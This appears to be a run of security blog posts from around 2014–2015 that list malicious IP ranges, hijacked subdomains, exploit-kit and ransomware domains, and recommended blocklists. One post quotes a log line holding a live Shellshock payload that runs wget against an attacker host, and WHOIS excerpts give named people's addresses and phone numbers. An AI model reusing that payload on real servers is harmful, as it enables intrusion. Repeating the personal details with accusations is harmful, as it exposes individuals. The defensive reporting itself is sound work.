I don't know how this Turkish host suballocates IPs to customers, but it is roughly equivalent to 31.210.96.152/29.

So how are these hijacks happening? Actually, I don't know although I do know that this is very common with GoDaddy accounts that use domaincontrol.com namservers. Perhaps the accounts are being phished, hit in an XSS attack or there is a weakness in GoDaddy's DNS architecture. GoDaddy are normally very good at cleaning this sort of thing up, so let's hope they can put a stop to this now.

What the exact payload of these IPs is I don't know because it is hardened against analysis, but they have hosted Ponmocup in the past.  I have observed traffic being sent to these server via hacked sites, and given the subdomain hijacking then it is clear that something very bad is going on. You can see an example of URLquery failing to analyse one of these sites here.. I suspect that the payload only works once per visiting IP.

You can see an example of some of the LIVE subdomains hosted on these IPs here [pastebin] or a full list of ALL the hijacked subdomains that I seen over time in this range here.

Currently, these following domains all have hijacked subdomains, as far as I can tell, they are all legitimate sites and I would hesitate to block them.. instead I would recommend blocking the IP address ranges listed above instead.

21ideas.com
2cuonline.com
4runnerliftkits.com
8jutawan.com
aabathlifts.com
adventureresponsibly.com
advertisementdevil.com
advertisewiththedevil.com
aesirholdings.com
agentonpoint.com
ahtcna.com
alhogames.com
alisonleese.com
allknowingpsychic.com
alloyfurnacerolls.com
alloymuffles.com
alloyradianttubes.com
allprodelta.com
alternateolympics.com
alternativeolympics.com
ancestorworshippublishing.com
animalgenetics.com
antonzuponcic.com
arc4g.com
aredietsok.com
aredietsokay.com
assistlist.com
asstimate.net
atvguidebooks.com
atv-guidebooks.com
atvtrailguides.com
autoeventregistration.com
automotiveeventregistration.com
automotiveservicesavings.com
autoserviceevent.com
aylesburyironing.com
azproremodelers.com
bahenasteel.com
bakecakesnow.com
basslakeshagclub.com
be3ny.com
benahavisrealestate.com
berkshirecapitalholdings.com
bestsilvercufflinks.com
bgtoledorent.com
birdsexingkit.com
blingmatters.com
blurlight.com
boeckman.net
breastimate.com
bridgenations.com
bristolblog.com
bristolwatch.com
bumperstickerpatriots.com
buybackmyvehicle.com
buynewaz.com
buynowbuynewaz.com
bvvk.com
canadianpilotcars.com
caninecolorgenetics.com
caninepaternitytesting.com
caseybassett.com
castlelawpa.com
caytechpools.com
charlesawells.com
chrisvessey.com
ciunev.com
concretevibration.com
connecteli.com
connectmetv.com
consul-tec.com
consumerdevil.com
cruzeonover.com
custom-chocolate-favors.com
customerdevil.com
dealerholidayevent.com
deespilotcars.com
defeattheliberalmedia.com
deliveredbythedevil.com
devilforacause.com
devilwithacause.com
dkshealth.com
drinkbluphoria.com
drinkcalories.net
drjaneaxelrod.com
dropoutgobig.com
dunstablekitchens.com
eaglepocatello.com
effectsllc.com
egunt.com
ellagphotography.com
empowerprinciples.com
engpua.com
enhancementlasers.com
enhancinglasers.com
equinepaternitytesting.com
exceltoner.com
exceltoners.com
facenewbook.com
fantasticfountain.com
fathersnsons.com
fatlosstoolkit.com
felixtreitler.com
feltedfibers.com
fighttheliberalmedia.com
fortheloveofgadgets.com
frankryn.com
freegascardregistration.com
fubarpaintball.com
funtrecks.net
funtreks.net
funtrekspublishing.com
gee-wizsolutions.com
getpaid365days.com
gillspools.com
girlsgoneglamis.com
gliscastings.net
gliscentrifugal.com
glisfabrications.com
glisinc.com
golfironworks.com
golfnewsalaska.com
golfnewsarkansas.com
golfnewscolorado.com
golfnewsconnecticut.com
golfnewsdelaware.com
golfnewsgeorgia.com
golfnewsidaho.com
golfnewsillinois.com
golfnewsindiana.com
golfnewsiowa.com
golfnewskansas.com
golfnewskentucky.com
golfnewslouisiana.com
golfnewsmaine.com
golfnewsmaryland.com
golfnewsmassachusetts.com
golfnewsmississippi.com
golfnewsmissouri.com
golfnewsmontana.com
golfnewsnebraska.com
golfnewsnewengland.com
golfnewsnewhampshire.com
golfnewsnewjersey.com
golfnewsnewmexico.com
golfnewsnewyork.com
golfnewsnorthcarolina.com
golfnewsnorthdakota.com
golfnewsohio.com
golfnewsoklahoma.com
golfnewspennsylvania.com
golfnewsrhodeisland.com
golfnewssouthcarolina.com
golfnewssouthdakota.com
golfnewstennessee.com
golfnewsutah.com
golfnewsvermont.com
golfnewsvirginia.com
golfnewswestvirginia.com
golfnewswisconsin.com
golfnewswyoming.com
grafikcase.com
grafikdevils.com
grafik-devils.com
grafik-skins.com
greatserviceforless.com
greatsoundevents.com
gregorylknox.com
grupa-kim.com
gryphonaz.com
gryphoncompanies.com
gryphonus.com
gssportspics.com
haosjer.com
hartford-capital.com
hbacagreenproremodelers.com
hbacaproremodelers.com
heattreatalloy.com
historyhobbybooks.com
hockeydoneright.com
hugesavingsevent.com
humphreyslawncare.com
icecreamtruckuniversity.com
imokh.com
inboccaproductions.com
inkandtonersale.com
integratedpipe.com
italy-in-bocca.com
javaemulator.com
jmydesign.com
joannheilman.com
joeamericashow.com
joechenphoto.com
jsjenterprises.com
juddnelsonstudios.com
kaitlinsplayground.com
kevindonnellymd.com
knoxkomputerservice.com
kokobon.com
ksupride.com
ksupridewrestling.com
ksuwrestling.net
lakehousetimberranch.com
laser-enhancements.com
laserhairenhancement.com
launchyourline.com
learningoverip.com
leashyourcamera.com
lendmecash.com
letseatinitaly.com
lifestylology.com
lindseytoothman.com
lionizetheworld.com
lionizeyourself.com
lions-mark.com
lovetoner.com
lovetoners.com
lsclinks.com
lusitanogold.com
makingwaves-salon.com
mangiamoinitalia.com
mangiamoneicantucci.com
mapclimber.com
matthewstarner.com
maxscenesdesign.com
mdmofgeorgia.com
memorialdaysavingsevent.com
mendezign.com
metoly.com
micksher.com
middlefieldma.net
midnightastronomy.com
mikemcmortgage.com
miracline.com
momsagainstmercury.com
monizarealty.com
mrsstyleseeker.com
mwhiteman.com
myabadi.com
mycameraleash.com
myfuturephysique.com
mystagingbox.com
my-ui.com
nacprint.com
newcarsat.com
newlogiq.com
newworldheroes.com
ngage-games.com
nitplus.com
nutritionbydesign.com
ny007ny.com
oharvest.net
omarker.net
omobia.com
onlybetterdeal.com
organixharvest.com
ozarkmountain4x4club.com
palermolundahl.com
pamsdogacademy.com
pamsdogtraining.com
panjiaying.com
panochevalleysolar.com
paulguardino.com
paxamericanaspirits.com
peekaboopumpkin.com
pennyappleapparel.com
pinkdollaratm.com
powerplaycreative.com
prestigehonda.net
propertiespain.com
qualitycomforthomeservices.com
realdealpsychic.com
registerforautoevent.com
reikisolar.com
remodelgreaterphoenix.com
renzograciemexico.com
restoremystuff.com
revolvertactical.net
richmondguitarx.com
rled.net
roaringlion.com
roaringlionenergydrink.com
savedalyfield.com
searchtrusted.com
secrettomb.com
sellitandforgetitnow.com
sellitandforgetittoday.com
shamrocksmokrz.com
shynlaw.com
signaturetoner.com
signaturetoners.com
skyviewphoto.com
slyforkfarm.com
snuffbottleworld.net
softmn.com
southvalleyrugby.com
specialpsychic.com
sportdoneright.com
springcleaningevent.com
squeezepagecentral.com
stainlessfabrications.com
stevesenergydrink.com
strongpsychic.com
studiosylverline.com
sunblockmaterials.com
tabeer-e-pakistan.com
tacomaliftkits.com
tagdeedlingua.com
tagdeed-translation.com
tagdeed-translations.com
techsupportauctions.com
teeboxpromo.com
telecomchicago.com
telecomillinois.com
telecomindiana.com
telecommichigan.com
tfgjustsayin.net
theafternoonjoker.com
theartdepot.net
thecinema6.com
thecollegeaddressshop.com
theeveningjoker.com
thehiddencorner.com
theknowledgekingdom.com
themorningjoker.com
thenightlyjoker.com
thinkadmit.com
thisishowthisworks.com
thisweekinwhiteness.com
thomasdesgrp.com
thomasdesigngroupllc.com
timkennywebdesign.com
timothykenny.com
timsicecreamtruck.com
timsroadtrip.com
toyotaliftkits.net
toyteclifts.net
trademarkrestoration.com
trademarkrestorationinc.com
tri-swelding.com
tropicaltoner.com
tuftsclimatejustice.com
turkrdns.com
twibularity.com
usdays.com
usedcarsat.com
usedmobi.com
valentinesalesevent.com
vehicleexchangeprogram.com
vehicleservicediscount.com
virtualsofts.com
warpets.com
webrunchhard.com
wenerdhard.com
whhholdingusainc.com
whhusainc.net
whichcameratookthis.com
whybuyanewhome.com
xn--80afcbdab0arg8e4c.com
xn--h1adlaje.net
yourcakedecoratingclass.com
yourcrystalball.com
yourspartanmovers.com
zombiesurvivalaptitudetest.com
zoomtoner.com
zoopoints.com
z-sat.com



Wednesday, 7 January 2015

Exploit kits on Choopa LLC / Gameservers.com IP addresses

While chasing down this exploit kit yesterday, I noticed an awful lot of related IP addresses and domains that also seemed to be hosting malware.

The characterstics of these malicious landing pages is that they use free domains (currently .co.vu) and seem to have a very short lifespan. As I write this, the following malicious domains are LIVE

ooshuchahxe.co.vu
ahjoneeshae.co.vu
phamiephim.co.vu
kaemahchuum.co.vu
pahsiefoono.co.vu
kaghaingai.co.vu
buengaiyei.co.vu
ohmiajusoo.co.vu
oodeerahshe.co.vu
paotuchepha.co.vu
aedeequeekou.co.vu
eikoosiexa.co.vu
phielaingi.co.vu
thohbeekee.co.vu

A typical exploit landing page looks like this [URLquery report] which appears to be the Nuclear EK.

These are hosted on the following Choopa LLC / Gamservers.com IP addresses (it is the same company with two different trading names) [clicking the IP leads to the VirusTotal results, ones identified as malicious are highlighted]:

108.61.165.69
108.61.165.70

108.61.165.96
108.61.167.160
108.61.172.139
108.61.175.125
108.61.177.107
108.61.177.89

All these malicious domains use the following nameservers:


ns1.thallsbe.com
ns1.yotelepa.com
ns1.zenteep.com
ns1.neverflouwks.com
ns1.daxpyorgilgere.com
ns1.irkoblik.com
ns2.thallsbe.com
ns2.yotelepa.com
ns2.zenteep.com
ns2.neverflouwks.com
ns2.daxpyorgilgere.com
ns2.irkoblik.com

Nameservers are mostly (but not all hosted on Choopa LLC IPs):

64.187.225.245
104.224.147.220
108.61.123.219
108.61.172.145
108.61.198.148
108.61.211.121

As I said, these domains see to have a very short life. I identified nearly 3000 domains using these nameservers, the following of which are flagged as malicious by Google (long list, sorry, scroll past it if you like):

offearfactory.cf
ukforsavectory.cf
ukforshivaflow.cf
soundchecker.cf
tobiahsebastiani.cf
crazystuff.ga
atproserafic.ga
soundchecker.ga
terriblelow.ml
stumbleupons.ml
ukforprimeebook.cf
greendriver.ga
ukforsavectory.ga
yellowcheck.ml
misterybook.cf
sporterafic.cf
thorteutsch.cf
imainconfig.ga
materofteck.ga
sporterafic.ga
pleskinebook.ga
lowensineflow.ga
warriordriver.ga
materofteck.ml
sporterafic.ml
lowensineflow.ml
mipkohoophw.cf
mipkoewushohn.cf
mipkoeerrw.ml
mipkohiocoh.ml
qdujbffg.cf
floraperf.cf
floreamva.cf
sintroota.cf
akcyvwkudu.cf
jepeugcpaq.cf
kzjzbbezgt.cf
rittfpynit.cf
unitedbeer.cf
vuktrontas.cf
wchiekohya.cf
wingasheng.cf
nikelnstate.cf
quitambient.cf
xotadddance.cf
xoteaddrack.cf
bloxianoiaba.cf
boyconroewom.cf
myfreenomapi.cf
walltaddates.cf
walltaddonce.cf
walltaddrave.cf
xoteaddotion.cf
trohqueenexai.cf
trotesaiheohu.cf
truechiekitha.cf
trueitheipoag.cf
vukontasixtas.cf
vuvatyisedron.cf
wallddforbake.cf
walltadddabit.cf
walltadddance.cf
walltadddsims.cf
wallteaddrack.cf
oproquanterbot.cf
veterloshamerr.cf
vuflowdeadcrow.cf
wallaerkinderr.cf
wallteaddotion.cf
wicomertulatti.cf
walltadddoppler.cf
amixionifyredhedi.cf
shamidgewoodpiste.cf
shoeufflorthrudis.cf
shoppaycleagoncad.cf
sosanasisernitive.cf
sourustieronixtur.cf
sparetediapletecu.cf
stekoneyredecklan.cf
subspironimitells.cf
sultintemicrearti.cf
coolmember.ga
krogralind.ga
rzanygngis.ga
unitedbeer.ga
wchiekohya.ga
weisewieku.ga
xotaddates.ga
xotaddrave.ga
junoreactor.ga
quitambient.ga
xoteaddrack.ga
dealerstrike.ga
trudahsheeso.ga
vumalworrest.ga
walltaddates.ga
walltaddonce.ga
walltaddrave.ga
wamipkoleoxw.ga
xoteaddotion.ga
proquantterms.ga
tritaeneiquoh.ga
trohqueenexai.ga
trotesaiheohu.ga
troyeachahgie.ga
truechiekitha.ga
truexauphudei.ga
victorysecret.ga
vuxeersktrace.ga
wallddforbake.ga
walltadddabit.ga
walltadddance.ga
walltadddsims.ga
wallteaddrack.ga
xotadddoppler.ga
veterloshamerr.ga
victoaddroplen.ga
vuflowdeadcrow.ga
vuvtrassktrace.ga
wallaerkinderr.ga
wallteaddotion.ga
wheallstechaxa.ga
wolscelipartin.ga
wolvestreyrmst.ga
walltadddoppler.ga
serckinvenaftovan.ga
shamidgewoodpiste.ga
shoppaycleagoncad.ga
sosanasisernitive.ga
sourustieronixtur.ga
sparetediapletecu.ga
stekoneyredecklan.ga
subspironimitells.ga
sultintemicrearti.ga
facilygda.ml
iqmhaslyzd.ml
kriendbasi.ml
queezerbot.ml
rittfpynit.ml
xotaddrave.ml
contermance.ml
crazyworlds.ml
junoreactor.ml
loborrowave.ml
quitambient.ml
vuxtronrace.ml
xoteaddrack.ml
bloxianoiaba.ml
trudahsheeso.ml
vumalworrest.ml
vumullefloor.ml
walltaddates.ml
walltaddonce.ml
walltaddrave.ml
xoteaddotion.ml
lodborrowpler.ml
proquantterms.ml
triceebicicha.ml
triilequadaev.ml
tritaeneiquoh.ml
troshiechooph.ml
trotesaiheohu.ml
victorysecret.ml
vuxeersktrace.ml
wallddforbake.ml
walltadddabit.ml
walltadddance.ml
walltadddsims.ml
wallteaddrack.ml
wamipkoicjnew.ml
oproquantables.ml
veterloshamerr.ml
victoaddroplen.ml
wallteaddotion.ml
wickleyoregene.ml
wolscelipartin.ml
walltadddoppler.ml
serckinvenaftovan.ml
shamidgewoodpiste.ml
shoeufflorthrudis.ml
shoppaycleagoncad.ml
sosanasisernitive.ml
sourustieronixtur.ml
sparetediapletecu.ml
stekoneyredecklan.ml
subspironimitells.ml
sultintemicrearti.ml
sintroota.tk
sionixire.tk
bugleryambur.tk
zarauphudei.cf
zaraachwahgie.cf
zaragietheeghe.cf
zarabixampw.ga
zaradhoophw.ga
zarasicjnew.ga
zarauphudei.ga
zaraachwahgie.ga
zaraeqwuadaev.ga
zaraheeteghoh.ga
zaraohgeegheis.ga
zaratiihuw.ml
zarabixampw.ml
zarasicjnew.ml
zarasorsarw.ml
zaraulleoxw.ml
zaraachwahgie.ml
zaraeqwuadaev.ml
zaraewneiquoh.ml
uzaraeserexwai.ml
zaragietheeghe.ml
zaraweethiocoh.ml

In addition, these domains are tagged as malicious by SURBL:
xoteaddrack.cf
wallddforbake.cf
xoteaddrack.ga
walltadddsims.ga
walltaddates.ml
walltadddabit.ml
wallteaddrack.ml
siewaxiesha.co.vu
fourkopoll.co.vu
kurramithompartherd.co.vu

These are the TLDs and SLDs being abused, operated by Freenom (cf, ga, gq, ml, tk) or CoDotVu (co.vu). It looks like perhaps Freenom cleaned up their space, but you can make your own mind up if you want to block traffic to these as a precaution:
co.vu
cf
ga
gq
ml
tk


A full list of all the domains that I can find associated with these servers can be found here [pastebin].

Recommended minimum blocklist (Choopa LLC IPs are highlighted):
108.61.123.219
108.61.165.69
108.61.165.70
108.61.165.96
108.61.167.160
108.61.172.139
108.61.172.145
108.61.175.125
108.61.177.107
108.61.177.89
108.61.198.148
108.61.211.121

64.187.225.245
104.224.147.220

UPDATE:
Choopa LLC say they have terminated those IPs. However, it may still be worth reviewing your logs for traffic to these servers as they might identify machines that have been compromised.


Wednesday, 31 December 2014

Evil network: 217.71.50.0/24 / ELTAKABEL-AS / TXTV d.o.o. Tuzla / aadeno@inet.ba

This post by Brian Krebs drew my attention to a block of Bosnian IP addresses with an unusually bad reputation. The first clue is given by Google's safe browsing diagnostics..

Safe Browsing
Diagnostic page for AS198252 (ELTAKABEL-AS)

What happened when Google visited sites hosted on this network?

    Of the 165 site(s) we tested on this network over the past 90 days, 6 site(s), including, for example, office-hosts.org/, invoice-ups.org/, refforwarding.eu/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2014-12-31, and the last time suspicious content was found was on 2014-12-26.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 10 site(s) on this network, including, for example, iprecognition.eu/, invoice-ups.net/, datavail.eu/, that appeared to function as intermediaries for the infection of 525 other site(s) including, for example, webtretho.com/, detik.com/, zaodich.com/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 15 site(s), including, for example, iprecognition.eu/, invoice-ups.net/, datavail.eu/, that infected 572 other site(s), including, for example, webtretho.com/, detik.com/, zaodich.com/.
Some of those domains rang a bell to do with recent malware attacks. One odd thing that struck me was that this is a sparsely populated but relatively large collection of IP addresses that appear to be mostly allocated to broadband customers rather than web hosts.

An investigation into what was lurking in this AS highlighted a problem block of 217.71.50.0/24 which contains very many bad sites, the WHOIS details for that block being..

inetnum:        217.71.48.0 - 217.71.63.255
descr:          TXTV d.o.o. Tuzla
org:            ORG-TdT1-RIPE
netname:        BA-TXTV-20030807
country:        BA
admin-c:        IK879-RIPE
tech-c:         IK879-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      MNT-NSC1
mnt-routes:     MNT-NSC1
notify:         ripe@txtv.ba
changed:        hostmaster@ripe.net 20030807
changed:        hostmaster@ripe.net 20040625
changed:        hostmaster@ripe.net 20050719
changed:        bitbucket@ripe.net 20081003
changed:        hostmaster@ripe.net 20110804
changed:        hostmaster@ripe.net 20140324
changed:        bit-bucket@ripe.net 20140325
source:         RIPE

organisation:   ORG-TdT1-RIPE
org-name:       TXTV d.o.o. Tuzla
org-type:       LIR
address:        TXTV d.o.o.
address:        Admir Jaganjac
address:        Focanska 1N
address:        75000
address:        Tuzla
address:        BOSNIA AND HERZEGOVINA
phone:          +38735353333
fax-no:         +38735266114
tech-c:         TXTV1-RIPE
abuse-mailbox:  abuse@txtv.ba
mnt-ref:        MNT-TXTV
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
admin-c:        AJ2947-RIPE
admin-c:        AA26986-RIPE
admin-c:        IK879-RIPE
abuse-c:        NSC11-RIPE
source:         RIPE
e-mail:         ripe@txtv.ba
changed:        bitbucket@ripe.net 20140324

person:         Igor Krneta
address:        Majora Drage Bajalovica 18
address:        78000 Banjaluka, BA
e-mail:         ripe@elta-kabel.com
phone:          +387 51 961 001
nic-hdl:        IK879-RIPE
mnt-by:         MNT-NAVIGOSC
changed:        ikrneta@navigosc.net 20071126
source:         RIPE

route:          217.71.50.0/24
descr:          Inet subnet #1
origin:         AS31630
mnt-by:         GENELEC-MNT
changed:        aadeno@inet.ba 20061029
source:         RIPE


I highlighted the part of most interest, which appears to be a block suballocated to someone using the email address aadeno@inet.ba.

I took a look at the sites hosted in this /24 and these are the results [csv]. There are 37 malicious websites (identified by Google) out of 185 that I found in this network range. The usual level of badness tends to be around 1%, but here it is 20%. Looking at the domains, it appears that there is nothing at all of value here and you can probably count them all as malicious.

Recommended blocklist:
217.71.50.0/24
darotkskeu.com
hijuvchr.com
humhfsara.com
lomospaoerotr.com
noerdfjkieswp.com
p28aa.com
pkoefkosaep.com
teeirkfoews.com
niggercar.es
invoice-ups.net
www-myups.net
invoice-myups.org
invoice-ups.org
office-hosts.org
softupdates.org
updatedns.org
www-myups.org
abdilo.ru
bihilafes.ru
cloudughtold.su
dedicnqher.su
dnspqajr.su
dnsxjkd.su
hosrvnwj.su
hostfjwmr.su
hostsple.su
hostyksn.su
servergotold.su
serverhersse.su
servermexyr.su
serveruey.su
serverxpqk.su
serviolt.su
ugulddedic.su
usehostru.su
uttofhost.su
vpsjsner.su
vpslopwz.su
baycityads.biz
blingstarscpm.biz
plustimber.biz
plutoads.biz
tempomedia.biz
dsffdsk323721372131.com
ny-discount-sales.com
rxmega-shop.com
rx-product-shop.com
safe-refill-rx.com
viphealhtmarket.com
datadirects.eu
dataremark.eu
dataresultsid.eu
datasynchronize.eu
datavail.eu
datsunplus.eu
dedistarid.eu
detectionstream1.eu
dmpcheck.eu
drellmedia.eu
elitemembers.eu
eplymedia.eu
eravideoads.eu
euserviceid.eu
forwardingref.eu
glowcheck.eu
iprecognition.eu
newsettingso.eu
ordealsting.eu
planacheck.eu
pluginverifys.eu
proudeuro.eu
refforwarding.eu
resellerapis.eu
rpmstatus.eu
samjectstar.eu
secondtierdirect.eu
selldataset.eu
soundads.eu
spokenads.eu
stretchstrong.eu
syncdata1.eu
trackingstreamchk.eu
trackstats.eu
trafficlax.eu
verablade.eu
club-rx-bestseller.ru
fuckaustralia.ru
rx-bestseller.ru




Tuesday, 9 December 2014

Something evil on 5.196.33.8/29

This Tweet from @Kafeine about the Angler EK drew my attention to a small block of OVH UK addresses of 5.196.33.8/29 which appear to be completely dedicated to distributing malware.

Specifically, VirusTotal lists badness on the following IPs:

5.196.33.8
5.196.33.9
5.196.33.10

There are also some doubtful looking IP addresses on 5.196.33.15 which may we have a malicious purpose.

All of these subdomains and domains [pastebin] are hosted in this block and I would suggest that you treat them as malicious.

Recommended blocklist:
5.196.33.8/29
jipwoyrnopwa.biz
kospoytrw.biz
belligerentladybug.com
hoplofrazoore.com
joptraeazalok.com
kiogosphwuysvx12.com
nelipraderson3.com
aderradpow.in
akojdurczopat.in
amoptrafnoger.in
apo83ggacer.in
apowiurbera.in
asdlpoqnoosgteer.in
asdpqwoieu12.in
asdqpwcya2.in
ashcytiqwer.in
askio2iytqrefa.in
asnodp3booztrea.in
azlaowumoa.in
blomcreaters.in
bvioplorazeno.in
bvopqcawea.in
bxpqy7everas.in
bzoapitradetn.in
cnertazootreas.in
coiqpyteramed.in
foksatboks3.in
golhahorsea.in
greolkopanx9.in
hiapwjertas.in
hokayreenols.in
jonofogolor.in
kiaowqptrea.in
koapnoxopaiuw72.in
kutradopretano98.in
lapouiqwg28.in
loatu27amop.in
looperfter4.in
mozgyterfaopetr.in
mxopa3ieravuk.in
nioapowedrakt.in
nitreamoptec.in
nloopboobs.in
npcowytrar.in
nxaopautrmoge.in
opqertasopma.in
poltraderano.in
sapertzalofasmo.in
vjogersamxe.in
vokjotreasmo.in
xboapvogtase.in
xnaiojipotram.in
xnaioqowhera.in
ywusbopa63a.in
zbtywraser.in
gpjfwsznuhdjgzwg.com
zntddwqtteq4.com

Incidentally, the .IN domains are not anonymised, but I would assume that the contact details are fake:
Registrant ID:WIQ_27860746
Registrant Name:Gennadiy Borisov
Registrant Organization:N/A
Registrant Street1:ul. Lyulyak 5
Registrant Street2:
Registrant Street3:
Registrant City:Varna
Registrant State/Province:
Registrant Postal Code:9000
Registrant Country:BG
Registrant Phone:+359.52601705
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:yingw90@yahoo.com


Thursday, 4 December 2014

Something evil on 46.161.30.0/24 (KolosokIvan-net / Ivan Kolosok)

The IP address range of 46.161.30.0/24 (KolosokIvan-net) appears to be dedicated purely to providing phone-home servers for TorrentLocker or some other similar malware.

In the past, this IP range has hosted various sites which have moved off. At the moment it seems to host just the following domains:

worldstocktrends.net
trackmepls.ru
casinoroyal7.ru
worldnews247.ru
clubstore29.ru
yourwebsupport.ru
countryregion.ru
chooseyourhost.ru

Active IPs are as follows:

46.161.30.16
46.161.30.18
46.161.30.20
46.161.30.20
46.161.30.24
46.161.30.41
46.161.30.42
46.161.30.43

Out of those domains, these following ones are linked with some sort of file locker malware:

casinoroyal7.ru [report]
clubstore29.ru [report]
yourwebsupport.ru [report]
chooseyourhost.ru [report]

The other domains have virtually no reference to them at all, which is somewhat suspicious.

The block as allocated as follows:

inetnum:        46.161.30.0 - 46.161.30.255
netname:        KolosokIvan-net
descr:          Net for customer ID 12510
country:        RU
admin-c:        KI811-RIPE
tech-c:         KI811-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-PIN
mnt-by:         MNT-PINSUPPORT
mnt-routes:     MNT-SELECTEL
changed:        admin@pinspb.ru 20130904
source:         RIPE

person:         Kolosok Ivan
address:        ul Lenina 19-56
phone:          +380766553642
e-mail:         kolosokivan@i.ua
nic-hdl:        KI811-RIPE
mnt-by:         KolosokIvan
changed:        kolosokivan@i.ua 20130830
source:         RIPE

route:          46.161.30.0/24
descr:          Selectel Customer
origin:         AS49505
mnt-by:         MNT-SELECTEL
changed:        korsakov@selectel.ru 20140901
source:         RIPE


There are no legitimate sites in this network range, so I strongly recommend that you block the entire 46.161.30.0/24 range.

Sunday, 28 September 2014

Evil network: Shellshock and MangoHost (mangohost.net) / 83.166.234.0/24

I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday. I noticed that some cheeky b--stard was probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://dynamoo.com/\""
ad.dipaz.biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range, registered to:

inetnum:        83.166.234.0 - 83.166.234.255
netname:        MangoHost-Net
descr:          S.R.L. MangoHost Network
descr:          str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
country:        MD
org:            ORG-SMN4-RIPE
admin-c:        VL6476-RIPE
tech-c:         VL6476-RIPE
status:         ASSIGNED PA
mnt-by:         RIM2000-MNT
notify:         noc@rim2000.ru
changed:        lukina@rim2000.ru 20140318
changed:        lukina@rim2000.ru 20140325
source:         RIPE

organisation:   ORG-SMN4-RIPE
org-name:       S.R.L. MangoHost Network
org-type:       OTHER
address:        str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
e-mail:         mangohostnetwork@gmail.com
abuse-c:        AR18923-RIPE
abuse-mailbox:  mangohostnetwork@gmail.com
mnt-ref:        CLOUDATAMD-MNT
mnt-by:         CLOUDATAMD-MNT
mnt-ref:        RIM2000-MNT
changed:        iuraqq@gmail.com 20140314
source:         RIPE

person:         Victor Letkovski
address:        T. Vladimirescu str 1/1 2024 Chisinau
phone:          +373 79 342393
nic-hdl:        VL6476-RIPE
mnt-by:         BSB-SERVICE-MNT
changed:        ripe@plusserver.de 20130520
source:         RIPE

% Information related to '83.166.234.0/24AS200019'

route:          83.166.234.0/24
descr:          S.R.L. MangoHost Network
origin:         AS200019
mnt-by:         RIM2000-MNT
changed:        lukina@rim2000.ru 20140319
source:         RIPE


MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau.

Until the past few days, MangoHost was hosting the ransomware sites listed here [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode.com, whatever that may be (you can guarantee it is nothing good).

Currently hosted domains include a collection of fake browser plugins, some malvertising sites, some porn, spam sites, hacker resources, ransomware domains and what might appear to be some fake Russian law firms. A list of everything that I can currently see in this /24 is:

for-your.biz
spr.for-your.biz
www.portw.org
1cpred.org
md1.vpn-service.us
jab.darkode.com
cappellina.com
ieplugins.net
ie-plugin.com
ie-addon.com
flanbase.org
porndays.org
allestic.org
shreqads.org
cpmjunction.org
indexcpm.org
friscoserve43.com
secsoncpm.com
clickcenter98.com
clickfunder81.com
adcountservices.com
ad.serverflamerstf.com
sfecpm.com
dialaclick.com
consultant-fond.ru
promo-consultin.ru
fond-consult.ru
rusinconsult.ru
yugconsalting.ru
partnersconsult.ru
buhsupport.biz
s2.futurevideo.su
s3.futurevideo.su
s4.futurevideo.su
tedaciokero.in
security-05znsa.pw
security-police5qnsa.pw
alert24world4xi.us
security-d07nsa.co.uk
security-g02nsa.co.uk
security-d07nsa.us
security-alert-nsacr.us
kubikrubik.me
ns1.kubikrubik.me
ns2.kubikrubik.me
ns2.kubikrubik.me
babulya.biz
ad.evhomebusiness.com
ad.emanuelecontractor.com
ad.theglamzsophisticate.com
ad.icanknittoo.info
smtp.gschultz.com
bounce.gschultz.com
smtp.agoodline.com
bounce.agoodline.com
smtp.ashlandmo.com
bounce.ashlandmo.com
smtp.circuitciy.com
bounce.circuitciy.com
ns2.hnnoceacecs.ru
ns2.jnojgnsecas.ru
ns2.jincoeacsc.ru
ns2.jnigunsecs.ru
zaconhelp.ru
pro-yurist.ru
yuristvsem.ru
zakon-vsem.ru
advocat4all.ru
pro-advocat.ru
yurist-info.ru
yuristzakon.ru
zakon-prost.ru
advocat-vsem.ru
advokat-prof.ru
jurist-otvet.ru
power-yurist.ru
pravomagistr.ru
zakon-yurist.ru
zakon-znatok.ru
zakonmagistr.ru
jurist-zabota.ru
yurist-vopros.ru
yurist-znatok.ru
advocat-jurist.ru
advocat-zakoni.ru
advokatura-pro.ru
pravoved-zakon.ru
pravovoiyurist.ru
yurist-protect.ru
yuristprozakon.ru
zakonhelponline.ru
pravoved-consult.ru
pravovoi-consultant.ru
analofday.com
www.analofday.com
ad.mobiplaystore.us
ad.glenlevit.us
ad.rioresults.us
ad.seojunctionaire.us
ad.directsign.us
ad.dipad.biz
ad.truestream.biz
ad.adrealmedia.biz
freelivepornwebcams.com

I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it.